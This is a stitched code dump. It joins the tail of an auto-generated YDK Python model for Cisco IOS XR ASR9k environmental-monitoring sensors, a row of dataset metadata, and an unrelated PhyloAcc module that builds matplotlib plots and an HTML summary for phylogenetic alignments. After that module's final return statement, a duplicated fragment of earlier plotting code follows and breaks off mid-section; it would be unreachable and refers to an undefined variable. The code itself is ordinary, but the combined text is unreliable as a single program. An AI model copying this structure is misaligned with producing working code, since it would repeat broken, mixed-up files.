self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed, ['threshold_severity', 'threshold_relation', 'threshold_value', 'threshold_evaluation', 'threshold_notification_enabled'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds']['meta_info']
class ValueDetailed(_Entity_):
"""
Detailed sensor information including
the sensor value
.. attribute:: field_validity_bitmap
Sensor valid bitmap
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: device_description
Device Name
**type**\: str
**length:** 0..50
**config**\: False
.. attribute:: units
Units of variable being read
**type**\: str
**length:** 0..50
**config**\: False
.. attribute:: device_id
Identifier for this device
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: value
Current reading of sensor
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: alarm_type
Indicates threshold violation
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: data_type
Sensor data type enums
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: scale
Sensor scale enums
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: precision
Sensor precision range
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: status
Sensor operation state enums
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: age_time_stamp
Age of the sensor value; set to the current time if directly access the value from sensor
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: update_rate
Sensor value update rate;set to 0 if sensor value is updated and evaluated immediately
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: average
Average sensor value over time interval
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: minimum
Minimum Sensor value over time interval
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: maximum
Maximum Sensor value over time interval
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: interval
Time Interval over which sensor value is monitored
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed, self).__init__()
self.yang_name = "value-detailed"
self.yang_parent_name = "sensor-name"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('field_validity_bitmap', (YLeaf(YType.uint32, 'field-validity-bitmap'), ['int'])),
('device_description', (YLeaf(YType.str, 'device-description'), ['str'])),
('units', (YLeaf(YType.str, 'units'), ['str'])),
('device_id', (YLeaf(YType.uint32, 'device-id'), ['int'])),
('value', (YLeaf(YType.uint32, 'value'), ['int'])),
('alarm_type', (YLeaf(YType.uint32, 'alarm-type'), ['int'])),
('data_type', (YLeaf(YType.uint32, 'data-type'), ['int'])),
('scale', (YLeaf(YType.uint32, 'scale'), ['int'])),
('precision', (YLeaf(YType.uint32, 'precision'), ['int'])),
('status', (YLeaf(YType.uint32, 'status'), ['int'])),
('age_time_stamp', (YLeaf(YType.uint32, 'age-time-stamp'), ['int'])),
('update_rate', (YLeaf(YType.uint32, 'update-rate'), ['int'])),
('average', (YLeaf(YType.int32, 'average'), ['int'])),
('minimum', (YLeaf(YType.int32, 'minimum'), ['int'])),
('maximum', (YLeaf(YType.int32, 'maximum'), ['int'])),
('interval', (YLeaf(YType.int32, 'interval'), ['int'])),
])
self.field_validity_bitmap = None
self.device_description = None
self.units = None
self.device_id = None
self.value = None
self.alarm_type = None
self.data_type = None
self.scale = None
self.precision = None
self.status = None
self.age_time_stamp = None
self.update_rate = None
self.average = None
self.minimum = None
self.maximum = None
self.interval = None
self._segment_path = lambda: "value-detailed"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed, ['field_validity_bitmap', 'device_description', 'units', 'device_id', 'value', 'alarm_type', 'data_type', 'scale', 'precision', 'status', 'age_time_stamp', 'update_rate', 'average', 'minimum', 'maximum', 'interval'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks']['meta_info']
def clone_ptr(self):
self._top_entity = EnvironmentalMonitoring()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoring']['meta_info']
| 61.815292
| 484
| 0.358588
| 9,124
| 153,611
| 5.745397
| 0.028058
| 0.021671
| 0.027088
| 0.035348
| 0.948074
| 0.925354
| 0.883081
| 0.858721
| 0.843307
| 0.833635
| 0
| 0.019256
| 0.569302
| 153,611
| 2,484
| 485
| 61.840177
| 0.77308
| 0.144208
| 0
| 0.690114
| 0
| 0.012357
| 0.112174
| 0.046336
| 0
| 0
| 0
| 0
| 0
| 1
| 0.098859
| false
| 0
| 0.039924
| 0
| 0.209125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6e1a3684c45606c4d8010581ca3127cba8e7dc2
| 34,072
|
py
|
Python
|
src/PhyloAcc-interface/phyloacc_lib/plot.py
|
gwct/PhyloAcc
|
089162e2bce5a17b95d71add074bf51bccc8a266
|
[
"MIT"
] | null | null | null |
src/PhyloAcc-interface/phyloacc_lib/plot.py
|
gwct/PhyloAcc
|
089162e2bce5a17b95d71add074bf51bccc8a266
|
[
"MIT"
] | null | null | null |
src/PhyloAcc-interface/phyloacc_lib/plot.py
|
gwct/PhyloAcc
|
089162e2bce5a17b95d71add074bf51bccc8a266
|
[
"MIT"
] | null | null | null |
#############################################################################
# Functions to generate plots and html files for easy visualization of
# input dataset
# Gregg Thomas
#############################################################################
import os
import shutil
import re
import phyloacc_lib.core as PC
import phyloacc_lib.tree as TREE
import phyloacc_lib.templates as TEMPLATES
import phyloacc_lib.templates_post as TEMPLATES_POST
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D as lines
import matplotlib.patches as mpatches
from Bio import Phylo
from io import StringIO
#############################################################################
def genPlots(globs):
step = "Generating summary plots";
step_start_time = PC.report_step(globs, step, False, "In progress...");
# Status updated
mpl.rcParams["axes.spines.right"] = False;
mpl.rcParams["axes.spines.top"] = False;
mpl.rcParams["axes.labelsize"] = 16;
mpl.rcParams["axes.edgecolor"] = "#595959";
mpl.rcParams["axes.linewidth"] = 1.5;
#mpl.rcParams["xtick.labelcolor"] = "#595959";
mpl.rcParams["xtick.labelsize"] = 14;
mpl.rcParams['xtick.color'] = "#595959";
mpl.rcParams['xtick.major.size'] = 6;
mpl.rcParams['xtick.major.width'] = 1.5;
#mpl.rcParams["ytick.labelcolor"] = "#595959";
mpl.rcParams["ytick.labelsize"] = 14;
mpl.rcParams['ytick.color'] = "#595959";
mpl.rcParams['ytick.major.size'] = 6;
mpl.rcParams['ytick.major.width'] = 1.5;
# Global theme settings for all matplotlib figures following
####################
st_file = os.path.join(globs['plot-dir'], globs['input-tree-plot-file']);
# The file to save the species tree figure
branch_cols = PC.coreCol(pal="wilke", numcol=3);
# The colors for the target, conserved, and outgroup branches
num_spec = len(globs['tree-tips']);
# The number of species in the input free, to adjust height of figure
targets, conserved, outgroups = TREE.categorizeBranches(globs, globs['tree-dict']);
# Get full lists of branches for each category
tree_str = TREE.addBranchLength(globs['labeled-tree'], globs['tree-dict'], no_label=True, keep_tp_label=True);
# Re-add branch lengths and remove labels to the input tree for plotting, keep the treeparse label to add colors below
handle = StringIO(tree_str);
tree = Phylo.read(handle, "newick");
# Parse the tree string with Bio
target_lg, conserve_lg, outgroup_lg = False, False, False;
#for clade in tree.get_terminals():
for clade in tree.find_clades():
if clade.name in targets:
clade.color = branch_cols[0];
target_lg = lines([0], [0], label="Targets", color = branch_cols[0]);
elif clade.name in conserved:
clade.color = branch_cols[1];
conserve_lg = lines([0], [0], label="Conserved", color = branch_cols[1]);
elif clade.name in outgroups:
clade.color = branch_cols[2];
outgroup_lg = lines([0], [0], label="Outgroup", color = branch_cols[2]);
if clade.name not in globs['tree-tips']:
clade.name = None;
# For internal nodes, remove the tree parse name so it doesn't show up on the plot
# Color the tip branches based on their input category and specify their legend entries
fig = plt.figure(figsize=(num_spec/4, 25.4/2.54));
# Specify the plot size depending on the number of species
axes = fig.add_subplot(1, 1, 1);
axes.axes.get_yaxis().set_visible(False);
axes.spines['left'].set_visible(False);
# Set the axes of the tree figure
Phylo.draw(tree, axes=axes, show_confidence=False, do_show=False);
# Draw the tree
legend_handles = [ lg for lg in [target_lg, conserve_lg, outgroup_lg] if lg ];
plt.legend(loc='upper left', handles=legend_handles);
# Add the legend
plt.savefig(st_file, dpi=100, bbox_inches='tight');
# Save the figure
# Species tree
####################
aln_list = [ aln for aln in globs['aln-stats'] ];
# A single list of alignment IDs for consistency between dictionary lookups
aln_len_hist_file = os.path.join(globs['plot-dir'], globs['aln-len-plot-file']);
aln_lens = [ globs['aln-stats'][aln]['length'] for aln in aln_list ];
plt.figure(figsize=(8,6));
plt.hist(aln_lens, color=PC.coreCol(pal="wilke", numcol=1, offset=1)[0], bins="sturges", edgecolor="#999999");
#plt.boxplot(locus_len)
plt.xlabel("Alignment length");
plt.ylabel("# loci");
plt.savefig(aln_len_hist_file, dpi=100);
# Locus length (hist)
####################
seq_len_hist_file = os.path.join(globs['plot-dir'], globs['seq-len-plot-file']);
seq_lens = [ globs['aln-stats'][aln]['avg-nogap-seq-len'] for aln in aln_list ];
plt.figure(figsize=(8,6));
plt.hist(seq_lens, color=PC.coreCol(pal="wilke", numcol=1, offset=2)[0], bins="sturges", edgecolor="#999999");
#plt.boxplot(locus_len)
plt.xlabel("Avg. sequence length without gaps (bp)");
plt.ylabel("# loci");
plt.savefig(seq_len_hist_file, dpi=100);
# Avg. sequence length without gaps (hist)
####################
# var_sites_hist_file = os.path.join(globs['plot-dir'], "variable-sites-hist.png");
var_sites = [ globs['aln-stats'][aln]['variable-sites'] for aln in aln_list ];
# plt.figure(figsize=(8,6));
# plt.hist(var_sites, color=PC.coreCol(pal="wilke", numcol=1)[0], bins="sturges", edgecolor="#999999");
# #plt.boxplot(locus_len)
# plt.xlabel("# of variable sites");
# plt.ylabel("# loci");
# plt.savefig(var_sites_hist_file);
# Variable sites (hist)
####################
inf_sites_hist_file = os.path.join(globs['plot-dir'], globs['inf-sites-plot-file']);
inf_sites = [ globs['aln-stats'][aln]['informative-sites'] for aln in aln_list ];
plt.figure(figsize=(8,6));
plt.hist(inf_sites, color=PC.coreCol(pal="wilke", numcol=1, offset=3)[0], bins="sturges", edgecolor="#999999");
#plt.boxplot(locus_len)
plt.xlabel("# of informative sites");
plt.ylabel("# loci");
plt.savefig(inf_sites_hist_file, dpi=100);
# Informative sites (hist)
####################
inf_sites_frac_hist_file = os.path.join(globs['plot-dir'], globs['inf-sites-frac-plot-file']);
#inf_sites_frac = [ globs['aln-stats'][aln]['informative-sites'] / globs['aln-stats'][aln]['length'] for aln in aln_list ];
inf_sites_frac = [ inf_sites[i] / aln_lens[i] for i in range(len(aln_lens)) ];
plt.figure(figsize=(8,6));
plt.hist(inf_sites_frac, color=PC.coreCol(pal="wilke", numcol=1, offset=4)[0], bins="sturges", edgecolor="#999999");
#plt.boxplot(locus_len)
plt.xlim([0, 1]);
plt.xlabel("Fraction of sites that are informative");
plt.ylabel("# loci");
plt.savefig(inf_sites_frac_hist_file, dpi=100);
# Fraction of sites that are informative (hist)
####################
var_inf_sites_file = os.path.join(globs['plot-dir'], globs['var-inf-sites-plot-file']);
slope, intercept = np.polyfit(var_sites, inf_sites, 1);
inf_sites_pred = np.polyval([slope, intercept], var_sites);
plt.figure(figsize=(8,6));
plt.plot(var_sites, inf_sites_pred, color="#333333", linestyle='dashed', dashes=(5, 20));
plt.scatter(var_sites, inf_sites, color=PC.coreCol(pal="wilke", numcol=1, offset=5)[0], alpha=0.25);
plt.xlabel("# of variable sites");
plt.ylabel("# of informative sites");
plt.savefig(var_inf_sites_file, dpi=100);
# Variable sites vs. informative sites (scatter w regression)
####################
if globs['run-mode'] == 'adaptive':
avg_scf_hist_file = os.path.join(globs['plot-dir'], globs['avg-scf-hist-file']);
avg_scf = [ globs['aln-stats'][aln]['node-scf-avg'] for aln in aln_list if globs['aln-stats'][aln]['node-scf-avg'] != "NA" ];
plt.figure(figsize=(8,6));
plt.hist(avg_scf, color=PC.coreCol(pal="wilke", numcol=1, offset=6)[0], bins="sturges", edgecolor="#999999");
plt.xlim([0, 1]);
plt.xlabel("Avg. sCF across all branches per locus");
plt.ylabel("# loci");
plt.savefig(avg_scf_hist_file, dpi=100);
# Avg. scf per locus (hist)
####################
low_scf_hist_file = os.path.join(globs['plot-dir'], globs['low-scf-hist-file']);
perc_low_scf = [ globs['aln-stats'][aln]['perc-low-scf-nodes'] for aln in aln_list if globs['aln-stats'][aln]['perc-low-scf-nodes'] != "NA" ];
plt.figure(figsize=(8,6));
plt.hist(perc_low_scf, color=PC.coreCol(pal="wilke", numcol=1, offset=7)[0], bins="sturges", edgecolor="#999999");
plt.xlim([0, 1]);
plt.xlabel("% of branches with sCF below " + str(globs['min-scf']) + " per locus");
plt.ylabel("# loci");
plt.savefig(low_scf_hist_file, dpi=100);
# % of branches with low sCF per locus (hist)
####################
scf_tree_file = os.path.join(globs['plot-dir'], globs['scf-tree-plot-file']);
# The file to save the species tree figure
tree_str = TREE.addBranchLength(globs['labeled-tree'], globs['tree-dict'], no_label=True, keep_tp_label=True);
for node in globs['scf']:
tree_str = tree_str.replace(node, node + "_" + str(round(globs['scf'][node]['avg-quartet-scf'], 2)));
# For every node in the tree, add the averaged scf value over all loci to the label
tree_str = re.sub("<[\d]+>[_]?", "", tree_str);
#tree_str = re.sub("<[\d]+>", "", tree_str);
#print(tree_str);
# Re-add branch lengths and remove labels to the input tree for plotting
handle = StringIO(tree_str);
tree = Phylo.read(handle, "newick");
# Parse the tree string with Bio
# for clade in tree.get_terminals():
# if clade.name in globs['targets']:
# clade.color = branch_cols[0];
# target_lg = lines([0], [0], label="Targets", color = branch_cols[0]);
# elif clade.name in globs['conserved']:
# clade.color = branch_cols[1];
# conserve_lg = lines([0], [0], label="Conserved", color = branch_cols[1]);
# elif clade.name in globs['outgroup']:
# clade.color = branch_cols[2];
# outgroup_lg = lines([0], [0], label="Outgroup", color = branch_cols[2]);
# # Color the tip branches based on their input category and specify their legend entries
fig = plt.figure(figsize=(num_spec/2.54, 25.4/2.54));
# Specify the plot size depending on the number of species
axes = fig.add_subplot(1, 1, 1);
axes.axes.get_yaxis().set_visible(False);
axes.spines['left'].set_visible(False);
# Set the axes of the tree figure
Phylo.draw(tree, axes=axes, do_show=False);
# Draw the tree
# plt.legend(loc='upper left', handles=[target_lg, conserve_lg, outgroup_lg]);
# Add the legend
plt.savefig(scf_tree_file, dpi=100, bbox_inches='tight');
# Save the figure
#globs['scf-labeled-tree']
# scf tree (phylo)
####################
bl_scf_file = os.path.join(globs['plot-dir'], globs['bl-scf-plot-file']);
bls, scfs = [], [];
for node in globs['tree-dict']:
if globs['tree-dict'][node][2] != 'internal':
continue;
if node not in globs['scf']:
continue;
bls.append(float(globs['tree-dict'][node][0]));
scfs.append(globs['scf'][node]['avg-quartet-scf']);
# Gets the values out of their tables
slope, intercept = np.polyfit(bls, scfs, 1);
scfs_pred = np.polyval([slope, intercept], bls);
plt.figure(figsize=(8,6));
plt.plot(bls, scfs_pred, color="#333333", linestyle='dashed', dashes=(5, 20));
plt.scatter(bls, scfs, color=PC.coreCol(numcol=1)[0], alpha=0.5);
plt.xlabel("Branch length");
plt.ylabel("sCF");
plt.savefig(bl_scf_file, dpi=100);
# Variable sites vs. informative sites (scatter w regression)
####################
step_start_time = PC.report_step(globs, step, step_start_time, "Success");
#############################################################################
def writeHTML(globs):
step = "Writing HTML summary file";
step_start_time = PC.report_step(globs, step, False, "In progress...");
# Status updated
# if not os.path.isdir(globs['html-dir']):
# shutil.copytree( os.path.join(globs['script-dir'], "html"), globs['html-dir'] );
# Copy the associated html files (stylesheets, images) from the provided template folders
if globs['run-mode'] == 'adaptive':
comment_start = "";
comment_end = "";
else:
comment_start = "<!-- This block is only used when run mode (-r) is adaptive";
comment_end = "-->";
# Some HTML blocks will be commented out depending on the run mode
if globs['theta']:
theta_comment_start = "";
theta_comment_end = "";
else:
theta_comment_start = "<!-- This block is only displayed when --theta is specified";
theta_comment_end = "-->";
if globs['coal-tree-file']:
coal_tree_comment_start = "";
coal_tree_comment_end = "";
else:
coal_tree_comment_start = "<!-- This block is only displayed when -l is specified";
coal_tree_comment_end = "-->";
if globs['batch']:
batch_comment_start = "<!-- This block is only displayed with the --plotonly option";
batch_comment_end = "-->";
else:
batch_comment_start = "";
batch_comment_end = "";
with open(globs['html-file'], "w") as htmlfile:
htmlfile.write(TEMPLATES.htmlSummary().format(
# mod_file=os.path.abspath(globs['mod-file']),
run_name=globs['run-name'],
run_time=globs['startdatetimenice'],
host_name=os.uname()[1],
script_call=globs['call'],
num_aln=str(globs['num-loci']),
num_no_inf_loci=str(len(globs['no-inf-sites-loci'])),
num_st_loci=str(globs['st-loci']),
num_gt_loci=str(globs['gt-loci']),
num_batches=str(globs['num-batches']),
batch_size=str(globs['batch-size']),
procs_per_batch=str(globs['procs-per-job']),
num_st_batches=str(len(globs['st-batches'])),
num_gt_batches=str(len(globs['gt-batches'])),
num_jobs=str(globs['num-jobs']),
num_spec=str(len(globs['tree-tips'])),
num_targets=str(len(globs['targets'])),
num_conserved=str(len(globs['conserved'])),
num_outgroups=str(len(globs['outgroup'])),
log_file=globs['logfilename'],
aln_stats_file=globs['alnstatsfile'],
batch_comment_start=batch_comment_start,
batch_comment_end=batch_comment_end,
snakemake_cmd=globs['smk-cmd'],
theta_comment_start=theta_comment_start,
theta_comment_end=theta_comment_end,
coal_tree_comment_start=coal_tree_comment_start,
coal_tree_file=globs['coal-tree-file'],
coal_tree_comment_end=coal_tree_comment_end,
input_tree_plot=os.path.join("plots", globs['input-tree-plot-file']),
avg_aln_len=str(round(globs['avg-aln-len'], 3)),
median_aln_len=str(round(globs['med-aln-len'], 3)),
avg_seq_len_nogap=str(round(globs['avg-nogap-seq-len'], 3)),
med_seq_len_nogap=str(round(globs['med-nogap-seq-len'], 3)),
aln_len_hist=os.path.join("plots", globs['aln-len-plot-file']),
seq_len_hist=os.path.join("plots", globs['seq-len-plot-file']),
informative_sites_hist=os.path.join("plots", globs['inf-sites-plot-file']),
informative_sites_frac_hist=os.path.join("plots", globs['inf-sites-frac-plot-file']),
variable_informative_sites_plot=os.path.join("plots", globs['var-inf-sites-plot-file']),
comment_start=comment_start,
comment_end=comment_end,
avg_scf_hist=os.path.join("plots", globs['avg-scf-hist-file']),
low_scf_hist=os.path.join("plots", globs['low-scf-hist-file']),
scf_tree_plot=os.path.join("plots", globs['scf-tree-plot-file']),
bl_scf_plot=os.path.join("plots", globs['bl-scf-plot-file']),
date_time=PC.getFooterDateTime(),
))
# Write the HTML summary file using the template
step_start_time = PC.report_step(globs, step, step_start_time, "Success");
globs['html-summary-written'] = True;
# Status update
return globs;
#############################################################################
def genPlotsPost(globs):
step = "Generating summary plots";
step_start_time = PC.report_step(globs, step, False, "In progress...");
# Status updated
mpl.rcParams["axes.spines.right"] = False;
mpl.rcParams["axes.spines.top"] = False;
mpl.rcParams["axes.labelsize"] = 16;
mpl.rcParams["axes.edgecolor"] = "#595959";
mpl.rcParams["axes.linewidth"] = 1.5;
mpl.rcParams["xtick.labelcolor"] = "#595959";
mpl.rcParams["xtick.labelsize"] = 14;
mpl.rcParams['xtick.color'] = "#595959";
mpl.rcParams['xtick.major.size'] = 6;
mpl.rcParams['xtick.major.width'] = 1.5;
mpl.rcParams["ytick.labelcolor"] = "#595959";
mpl.rcParams["ytick.labelsize"] = 14;
mpl.rcParams['ytick.color'] = "#595959";
mpl.rcParams['ytick.major.size'] = 6;
mpl.rcParams['ytick.major.width'] = 1.5;
# Global theme settings for all matplotlib figures following
####################
# st_file = os.path.join(globs['plot-dir'], globs['input-tree-plot-file']);
# # The file to save the species tree figure
# branch_cols = PC.coreCol(pal="wilke", numcol=3);
# # The colors for the target, conserved, and outgroup branches
# num_spec = len(globs['tree-tips']);
# # The number of species in the input free, to adjust height of figure
# tree_str = TREE.addBranchLength(globs['labeled-tree'], globs['tree-dict'], no_label=True);
# #print(tree_str);
# # Re-add branch lengths and remove labels to the input tree for plotting
# handle = StringIO(tree_str);
# tree = Phylo.read(handle, "newick");
# # Parse the tree string with Bio
# for clade in tree.get_terminals():
# if clade.name in globs['targets']:
# clade.color = branch_cols[0];
# target_lg = lines([0], [0], label="Targets", color = branch_cols[0]);
# elif clade.name in globs['conserved']:
# clade.color = branch_cols[1];
# conserve_lg = lines([0], [0], label="Conserved", color = branch_cols[1]);
# elif clade.name in globs['outgroup']:
# clade.color = branch_cols[2];
# outgroup_lg = lines([0], [0], label="Outgroup", color = branch_cols[2]);
# # Color the tip branches based on their input category and specify their legend entries
# fig = plt.figure(figsize=(num_spec/2.54, 25.4/2.54));
# # Specify the plot size depending on the number of species
# axes = fig.add_subplot(1, 1, 1);
# axes.axes.get_yaxis().set_visible(False);
# axes.spines['left'].set_visible(False);
# # Set the axes of the tree figure
# Phylo.draw(tree, axes=axes, show_confidence=False, do_show=False);
# # Draw the tree
# plt.legend(loc='upper left', handles=[target_lg, conserve_lg, outgroup_lg]);
# # Add the legend
# plt.savefig(st_file, dpi=100, bbox_inches='tight');
# # Save the figure
# Species tree
####################
locus_list = [ locus for locus in globs['locus-stats']['elem_lik'] ];
# A single list of alignment IDs for consistency between dictionary lookups
bf1s = [ float(globs['locus-stats']['elem_lik'][locus]['logBF1']) for locus in locus_list ];
bf2s = [ float(globs['locus-stats']['elem_lik'][locus]['logBF2']) for locus in locus_list ];
# The Bayes factors
globs['accelerated-loci'] = [ locus_list[i] for i in range(len(locus_list)) if bf1s[i] > globs['bf1-cutoff'] and bf2s[i] > globs['bf2-cutoff'] ];
# Get a list of the accelerated loci
####################
bf1_dist_file = os.path.join(globs['plot-dir'], globs['bf1-dist-file']);
#bf1s = [ 0.0 if bf1 > 500 or bf1 < -500 else bf1 for bf1 in bf1s ];
plt.figure(figsize=(8,6));
plt.hist(bf1s, color=PC.coreCol(pal="wilke", numcol=1, offset=1)[0], bins="sturges", edgecolor="#999999");
#plt.boxplot(locus_len)
plt.xlabel("log BF1");
plt.ylabel("# loci");
plt.savefig(bf1_dist_file, dpi=100);
# BF1 (hist)
####################
bf2_dist_file = os.path.join(globs['plot-dir'], globs['bf2-dist-file']);
#bf2s = [ 0.0 if bf2 > 500 or bf2 < -500 else bf2 for bf2 in bf2s ];
plt.figure(figsize=(8,6));
plt.hist(bf2s, color=PC.coreCol(pal="wilke", numcol=1, offset=2)[0], bins="sturges", edgecolor="#999999");
#plt.boxplot(locus_len)
plt.xlabel("log BF2");
plt.ylabel("# loci");
plt.savefig(bf2_dist_file, dpi=100);
# BF2 (hist)
####################
bf1_bf2_file = os.path.join(globs['plot-dir'], globs['bf1-bf2-plot-file']);
slope, intercept = np.polyfit(bf1s, bf2s, 1);
bf2s_pred = np.polyval([slope, intercept], bf1s);
bf1s_filtered = [ bf1s[i] for i in range(len(locus_list)) if bf1s[i] < 20 and bf1s[i] > -5 and bf2s[i] > -2 and bf2s[i] < 50 ]
bf2s_filtered = [ bf2s[i] for i in range(len(locus_list)) if bf1s[i] < 20 and bf1s[i] > -5 and bf2s[i] > -2 and bf2s[i] < 50 ]
plt.figure(figsize=(8,6));
#plt.plot(bf1s, bf2s_pred, color="#333333", linestyle='dashed', dashes=(5, 20));
plt.scatter(bf1s, bf2s, color=PC.coreCol(pal="wilke", numcol=1, offset=5)[0], alpha=0.25);
plt.axvline(x=globs['bf1-cutoff'], color='#d3d3d3', linestyle='--')
plt.axhline(y=globs['bf2-cutoff'], color='#d3d3d3', linestyle='--')
plt.xlabel("log BF1");
plt.ylabel("log BF2");
plt.savefig(bf1_bf2_file, dpi=100);
# for i in range(len(locus_list)):
# if bf1s[i] > 10 and bf2s[i] > 1:
# print(locus_list[i]);
# BF1 vs. BF2 (scatter w regression)
####################
step_start_time = PC.report_step(globs, step, step_start_time, "Success");
return globs;
seq_len_hist_file = os.path.join(globs['plot-dir'], globs['seq-len-plot-file']);
seq_lens = [ globs['aln-stats'][aln]['avg-nogap-seq-len'] for aln in aln_list ];
plt.figure(figsize=(8,6));
plt.hist(seq_lens, color=PC.coreCol(pal="wilke", numcol=1, offset=2)[0], bins="sturges", edgecolor="#999999");
#plt.boxplot(locus_len)
plt.xlabel("Avg. sequence length without gaps (bp)");
plt.ylabel("# loci");
plt.savefig(seq_len_hist_file, dpi=100);
# Avg. sequence length without gaps (hist)
####################
# var_sites_hist_file = os.path.join(globs['plot-dir'], "variable-sites-hist.png");
var_sites = [ globs['aln-stats'][aln]['variable-sites'] for aln in aln_list ];
# plt.figure(figsize=(8,6));
# plt.hist(var_sites, color=PC.coreCol(pal="wilke", numcol=1)[0], bins="sturges", edgecolor="#999999");
# #plt.boxplot(locus_len)
# plt.xlabel("# of variable sites");
# plt.ylabel("# loci");
# plt.savefig(var_sites_hist_file);
# Variable sites (hist)
####################
inf_sites_hist_file = os.path.join(globs['plot-dir'], globs['inf-sites-plot-file']);
inf_sites = [ globs['aln-stats'][aln]['informative-sites'] for aln in aln_list ];
plt.figure(figsize=(8,6));
plt.hist(inf_sites, color=PC.coreCol(pal="wilke", numcol=1, offset=3)[0], bins="sturges", edgecolor="#999999");
#plt.boxplot(locus_len)
plt.xlabel("# of informative sites");
plt.ylabel("# loci");
plt.savefig(inf_sites_hist_file, dpi=100);
# Informative sites (hist)
####################
inf_sites_frac_hist_file = os.path.join(globs['plot-dir'], globs['inf-sites-frac-plot-file']);
